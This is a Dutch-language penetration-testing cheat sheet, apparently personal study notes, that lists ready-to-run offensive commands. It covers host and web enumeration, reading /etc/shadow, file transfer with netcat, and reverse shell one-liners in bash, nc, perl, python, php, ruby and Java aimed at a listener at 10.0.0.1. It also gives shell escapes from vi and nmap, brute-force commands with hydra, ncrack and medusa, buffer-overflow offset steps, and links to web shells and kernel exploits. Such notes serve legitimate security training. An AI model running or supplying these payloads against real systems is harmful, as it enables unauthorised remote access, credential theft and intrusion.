Aantekeningen

Netwerk enumeratie

netdiscover
nbtscan 10.0.1.0/24
nmap -sn 10.0.0.0/16

nmap -p- 10.0.1.150 -sV -O -A

Enumeratie

sudo toegestane commando’s: sudo -l

luisterende poorten: netstat -lntp

eigenaar poort: lsof -i:4444

cat /etc/passwd
cat /etc/shadow

windows versie bepalen: systeminfo | findstr /B /C:”OS Name” /C:”OS Version”

website
nikto -h http://1.2.3.4
nikto -host $targetip -port $targetport

dirb http://1.2.3.4 <wordlist>
dirbuster
gobuster dir -u http://1.2.3.4 -w <wordlist> -x <extensie>,<extensie>

dirsearch.py -w <wordlist> -u $targetip -e <extenstie>

wpscan –url http://1.2.3.4:8080/

Bestanden overdragen tussen machines

NC
Lokaal: nc -nvlp 4444 > file.txt
Remote: nc -nv 1.2.3.4 4444 < file.txt

php
php -S localhost:4444

python
python -m SimpleHTTPServer 4444
python3 -m http.server 4444

wget http://1.2.3.4:4444/file.txt
curl http://1.2.3.4:4444 > file.txt

Reverse shell one-liners

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc -e /bin/sh 10.0.0.1 1234
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

perl -e ‘use
Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getproto
byname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&
S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

python -c ‘import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STR
EAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

JAVA: r = Runtime.getRuntime() p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[]) p.waitFor()

Shell upgrade naar interactive TTY

python -c ‘import pty; pty.spawn(“/bin/sh”)’
/bin/sh -i
echo os.system(‘/bin/bash’)

perl —e ‘exec “/bin/sh”;’
perl: exec “/bin/sh”;
ruby: exec “/bin/sh”
lua: os.execute(‘/bin/sh’)

Shell vanuit applicaties

IRB: exec “/bin/sh”
VI: !bash
VI: set shell=/bin/bash:shell
NMAP: !sh

Bruteforce tools

hydra -l root -P password-file.txt 1.2.3.4 ssh
hydra -P password-file 1.2.3.4 snmp

ncrack -vv –user gebruiker -P password-file.txt rdp://1.2.3.4

medusa -h 1.2.3.4 -u admin -P password-file.txt -M http -m DIR:/admin -T 10

Verzamelen gegevens van websites

theharvester -d 1-0-1.nl -b google > google.txt

cewl http://www.site.nl > site.txt
cewl –depth 0 -w output.txt https://en.wikipedia.org/wiki/Billy_Madison

python wordcollector.py http://www.site.nl

Woordenlijst maken

tr -sc'[A-Z][a-z]’ ‘[\012*]’ < input | sort | uniq > output

mp64 bla?a?a

crunch 6 6 01234567890ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 8 8 -t ,@@^^%%%
@ = lower case alpha
, = upper case alpha
& = numeric characters
^ = special characters including space

Buffer overflow punt bepalen

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
/pattern_offset.rb -l 2700 -q 3969443

Python
buffer = “A” * 2606 + “B” * 4 + “C” * 90


Bad characters bepalen
Stuur reeks van 0x00 tot 0xff en kijk waar er wordt afgebroken.

Debugging van toepassingen

edb –run <programma>


URL’s

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
https://github.com/flozz/p0wny-shell/raw/master/shell.php

https://www.kernel-exploits.com
https://github.com/b374k/b374k/blob/v3.2.3/b374k.min.php
https://highon.coffee/blog/lfi-cheat-sheet/
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/superkojiman/onetwopunch
https://github.com/Ganapati/RsaCtfTool
https://sparta.secforce.com/
https://github.com/maurosoria/dirsearch
http://www.fuzzysecurity.com/tutorials/16.html
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheatsheet
https://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/